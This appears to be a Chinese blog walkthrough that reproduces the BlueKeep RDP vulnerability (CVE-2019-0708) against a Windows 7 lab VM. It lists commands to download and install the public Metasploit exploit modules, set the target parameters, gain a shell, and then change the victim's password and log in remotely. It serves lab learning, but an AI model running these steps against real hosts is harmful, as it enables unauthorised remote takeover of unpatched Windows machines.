CVE-2019-0708漏洞复现

CVE-2019-0708背景

Windows系列服务器于2019年5月15号,被爆出高危漏洞,该漏洞影响范围较广,漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击的。这个漏洞是今年来说危害严重性最大的漏洞,跟之前的勒索,永恒之蓝病毒差不多。
CVE-2019-0708这个漏洞最早爆出是在今年5月份,不过当时这个漏洞POC只能使得目标主机蓝屏,在前一段时间爆出来可以反弹shell的exp,下面我来演示复现一下。

影响系统

开启了3389端口。

  1. windows2003;
  2. windows2008;
  3. windows2008 R2;
  4. windows xp;
  5. windows 7;

测试环境

使用VM安装Windows7 x64SP1模拟受害机
vm虚拟机安装的时候默认是家庭版的,所以在安装的时候要选择一下。
在这里插入图片描述
在计算机右键-属性-远程设置-允许…
在这里插入图片描述
在cmd确认是否开启3389端口
在这里插入图片描述

更新kali linux

apt-getupdate & apt-get upgrade
apt-get dist-upgrade

更新msf

参考:https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
  chmod 755 msfinstall && \
  ./msfinstall

下载cve_2019_0708模块

wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb

wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb

wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

查看msf安装的路径

find / -name 'metasploit'

在这里插入图片描述

拷贝模块

下载下来后,直接复制到对应的路径。
cp rdp.rb /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/
cp rdp_scanner.rb /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/

如果这里没有rdp目录,就用mkdir命令创建一个rdp目录
cp cve_2019_0708_bluekeep_rce.rb /opt/metasploit-framework/embedded/framework/modules/exploits/rdp/
cp cve_2019_0708_bluekeep.rb /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/

漏洞复现

1.启动msf
在这里插入图片描述
2.使用reload_all重新加载模块
在这里插入图片描述
3.use exploit/rdp/cve_2019_0708_bluekeep_rce
在这里插入图片描述
4.主要设置的参数有RHOSTS / target

  • RHOSTS 目标机ip
  • target ID数字(可选为0-4)设置受害机机器架构
Exploit targets:

   Id  Name
   --  ----
   0   Automatic targeting via fingerprinting
   1   Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
   2   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox)
   3   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare)
   4   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)

在这里插入图片描述
失败了好几次,有几次出现蓝屏,最后还是可以了~
在这里插入图片描述在这里插入图片描述在这里插入图片描述
在首选项修改兼容gb2312
在这里插入图片描述

远程登陆

更改用户密码,并进行远程登陆。

登陆

在这里插入图片描述
在这里插入图片描述

评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值